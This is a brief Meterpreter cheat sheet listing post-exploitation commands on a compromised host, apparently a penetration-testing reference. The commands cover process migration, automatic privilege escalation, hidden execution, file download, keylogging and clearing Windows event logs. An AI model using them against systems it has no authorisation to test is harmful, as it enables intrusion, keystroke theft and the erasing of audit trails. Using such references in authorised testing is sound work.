Meterpreter Cheat Sheet

General

background
Put the Meterpreter session in the background
sessions -i $SESSION_ID
Return to a backgrounded Meterpreter session (run from the msfconsole prompt)

Machine Info

System

sysinfo
System information

Network

ifconfig
Network information

Processes

ps
List running processes
getpid
Get the process ID of the process hosting the Meterpreter session (takes no argument)
migrate $PID
Migrate to a process using its process ID

Files

Navigation

cd
Change directory
ls
List directory
search -f $FILE_NAME
Search for a file

File content

cat
Print the contents of a file
edit
Open a text editor

Download/Upload

download
Download a file (in Windows paths, replace single backslashes with double backslashes)
upload
Upload a file

Execution

execute -f $PROGRAM_TO_EXECUTE -i -H
Execute a file (-i for interactive, -H for hidden)
shell
Open a shell
run $METASPLOIT_SCRIPT
Run a Metasploit script or post module

Exploitation

Windows

getsystem
Automatically attempt privilege escalation
run post/windows/gather/enum_applications
Enumerate the applications installed on the machine
run post/windows/manage/migrate
Automatically launch and migrate to notepad.exe

Multi

keyscan_start
Start the keylogger
keyscan_dump
Dump the content of the keylogger
keyscan_stop
Stop the keylogger
clearev
Clear the event logs (needs admin)